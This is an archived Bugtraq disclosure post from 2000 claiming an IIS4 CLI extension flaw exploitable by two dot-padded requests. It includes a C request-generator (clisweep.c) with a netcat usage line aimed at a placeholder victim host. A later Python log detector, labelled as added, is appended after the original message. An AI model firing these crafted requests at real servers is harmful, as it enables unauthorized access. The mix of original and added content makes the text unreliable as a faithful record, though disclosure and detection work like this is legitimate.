Bugtraq mailing list archives
Shinex vs. IIS CLI Extensions
From: dev-null () NO-ID COM (dev-null () NO-ID COM)
Date: Mon, 5 Jun 2000 12:31:38 -0000
[ This message has been sent anonymously due to configuration problems I'm experiencing with my mail server. If you would like to discuss the fine points of this post, you're quite welcome to message me on Efnet (nickname: shinex). ]

While doing a security audit on a WinNT 4.0 system, I discovered an `object collision` vulnerability that can potentially lead to remote compromise. The flaw lies in the mechanism employed by CLI objects to handle dynamic pre-auth requests from a stateful client. States of operation are inherent in the implementation itself. This flaw could lead to a determined attacker gaining administrative privileges on servers using this widely deployed object kit.

EXPLOITATION NOTES
------------------

Request #1: http://www.victim.com/.....~518 chars.../[invocation of CLI object]
Request #2: http://www.victim.com/.....~260 chars.../[request with req1 object as ext]

Simple as that. It's important that both requests reach the target server within a timeframe of 15 seconds (a rough estimate). Your threshold may vary. Subsequent requests will be made with raised authorization levels. The rationale for the char padding will be available later in the followup post (see below).

Microsoft has been notified and patching information should be forthcoming. While not as severe as the RDS vulnerability, it is still an avenue of attack that could provide a determined attacker with unauthorized access.

(Allow me to mention in passing that the scarcity of detail in this paper is intentional. A more thorough assessment will be posted after Microsoft have released their hotfix.)

HELPER CODE
-----------

/*
** clisweep.c by shinex (efnet)
** Quick generator for IIS4 CLI extension vuln URLs.
**
** $ (./clisweep <cli object> ; cat) | nc www.victim.com 80
**
** OK. This code is buggy, because I mistakenly thought
** that both requests would be delivered without having
** to restart netcat. I can't code network apps. Sorry.
**
*/

#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define DOT1 518
#define DOT2 260
#define THRESHOLD 15
#define RANDFILE "AABBCC"

char *gendots(int);
char *calc(char *);

int main(int argc, char *argv[])
{
    char req1[1024], req2[1024];

    if(argc != 2) {
        fprintf(stderr, "Usage: %s <cli object>\n", *argv);
        return -1;
    }

    /* snprintf instead of sprintf so a long object name cannot overrun req1/req2 */
    snprintf(req1, sizeof(req1), "GET /%s/%s", gendots(DOT1), argv[1]);
    snprintf(req2, sizeof(req2), "GET /%s/%s", gendots(DOT2), calc(argv[1]));

#ifdef SCRIPTKIDPROTECTION
    printf("%s\n\n", req1);
    sleep(THRESHOLD);
    printf("%s\n\n", req2);
#endif

    return 0;
}

/* Returns a static buffer holding `num` dots. */
char *gendots(int num)
{
    int i;
    static char dots[1024];
    char *ptr = dots;

    if(num > (int)sizeof(dots) - 1)
        num = sizeof(dots) - 1;

    for(i = 0; i < num; i++)
        *ptr++ = '.';

    /* terminate here: the buffer is reused, and the second (shorter) call
       would otherwise still return the leftover dots of the first one */
    *ptr = '\0';

    return dots;
}

/* Strips the extension from `arg` (in place) and prepends RANDFILE. */
char *calc(char *arg)
{
    static char file[1024];
    char *ptr;

    ptr = strrchr(arg, '.');
    if(ptr != NULL)        /* only truncate when there is an extension */
        *ptr = '\0';

    snprintf(file, sizeof(file), "%s.%s", RANDFILE, arg);

    return file;
}

SHOUTOUTS
---------

Greets to route and my other friends.

--
This message has been sent via an anonymous mail relay at www.no-id.com.
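The post describes the observable pattern on the server side: two requests from the same client whose paths carry hundreds of consecutive dots, arriving within roughly 15 seconds. The following added detection example (not part of the original post or Microsoft's response) scans constructed IIS W3C-style log lines for that pattern; the 64-dot threshold and the log field layout are assumptions for illustration.

```python
import re
from datetime import datetime

# Constructed sample log lines (date time c-ip cs-method cs-uri-stem sc-status).
# Made up for this example; not taken from the original post.
SAMPLE_LOG = """\
2000-06-05 12:31:10 10.0.0.5 GET /index.html 200
2000-06-05 12:31:12 10.0.0.9 GET /{d518}/object.cli 200
2000-06-05 12:31:20 10.0.0.9 GET /{d260}/AABBCC.object 200
2000-06-05 12:45:00 10.0.0.9 GET /{d518}/other.cli 404
""".format(d518="." * 518, d260="." * 260)

# Assumption: legitimate paths never contain 64 or more consecutive dots.
DOT_RUN = re.compile(r"\.{64,}")
WINDOW_SECONDS = 15  # pairing window quoted in the post (a rough estimate there too)


def parse_line(line):
    """Split one constructed log line into (timestamp, client ip, uri)."""
    date, time, ip, _method, uri, _status = line.split()
    ts = datetime.strptime(f"{date} {time}", "%Y-%m-%d %H:%M:%S")
    return ts, ip, uri


def find_padded_requests(log_text):
    """Return (timestamp, client ip, dot-run length) for every request
    whose path contains a long run of dots."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, ip, uri = parse_line(line)
        match = DOT_RUN.search(uri)
        if match:
            hits.append((ts, ip, len(match.group())))
    return hits


def find_paired_requests(log_text, window=WINDOW_SECONDS):
    """Return (client ip, first ts, second ts) for each pair of dot-padded
    requests from the same client that arrived within `window` seconds."""
    hits = find_padded_requests(log_text)
    flagged = []
    for i, (ts1, ip1, _) in enumerate(hits):
        for ts2, ip2, _ in hits[i + 1:]:
            if ip1 == ip2 and 0 <= (ts2 - ts1).total_seconds() <= window:
                flagged.append((ip1, ts1, ts2))
    return flagged
```

Run over the sample, only the 12:31:12 / 12:31:20 pair from 10.0.0.9 is flagged; the later 12:45:00 request is padded but falls outside the window.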
Current thread:
- Shinex vs. IIS CLI Extensions dev-null () NO-ID COM (Jun 05)
- Re: Shinex vs. IIS CLI Extensions Microsoft Security Response Center (Jun 08)